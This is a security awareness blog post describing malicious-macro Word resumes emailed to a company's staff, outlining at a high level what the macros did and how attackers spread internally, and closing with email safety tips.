Threat Spotlight: Emailed Resumes and Advanced Persistent Threats

With the New Year upon us, many hopeful employees are polishing off those resumes in hopes of taking advantage of new opportunities. This has brought an interesting opportunity for criminals as well.  In this Threat Spotlight, we focus on an attack where resumes are used as bait for unsuspecting targets.

Highlighted Threat: 

Advanced Persistent Threats in Unsuspected Places – Resumes

The Details:

In a two-week period in late 2016, one of our customers received five resumes that contained an Advanced Persistent Threat (APT). For perspective, five sounds like a low number until you realize it only takes one APT to compromise your credibility, bring down your entire network, or even steal billions of dollars.

The resumes were all .doc files that contained a malicious macro. Upon detonating the file, the macro executed highly malicious activity.  The macro immediately:

1. Downloaded and executed a visual basic script


2. Imported external functions from the web and ran them


3. Spawned a shell


4. Connected to a remote server


5. Actively began work to evade the computer’s built-in anti-virus

Each one of the attacks originated from a different email, and each one of them targeted a different employee. Two of the employees were administrative assistants, one was in accounting, and two others were in general administration. This follows a pattern where hackers don’t necessarily need to infiltrate sensitive accounts, such as those belonging to senior executives in the company or someone in IT. Instead, they seek to infiltrate the “weakest link” in the company in terms of security, and unsuspecting users typically fit that bill perfectly. After they infect an account or an endpoint, they typically proceed to infiltrate the rest of the organization from within, quietly before anyone ever realizes.

These are two typical modes of operation:

(1) After infecting one of the accounts (e.g., with a resume attack), they will then send a new threat to a different account using the email of the original employee infected.

(2) They infect an account and track who in the company oversees wire transfers, invoices, and so forth. Then they will use that information to launch a targeted spear phishing attack.

The emails were written casually with a friendly manner, and were designed to impersonate a colleague asking another colleague about their opinion about a resume. Seems innocent enough, yes?

In all cases, the email was opened by the employee because they mistakenly thought it was a legitimate resume that was sent to them.

This threat underscores the importance of always following best practices when dealing with email.  For example:

• Do not click on any links in email. Type the address directly into your browser.

• Do not open suspicious attachments, even if they seem to be from someone you trust.

• Keep endpoint antivirus, patches, and other software updated.

• Do not reveal sensitive personal or company information in email.

• If you aren’t sure of whether an email is legitimate, verify by contacting the company or person directly on the phone, or through legitimate communications you have previously received from that company.

Once end-users are trained to follow best practices, ongoing awareness training may reinforce these skills and help turn them into habits.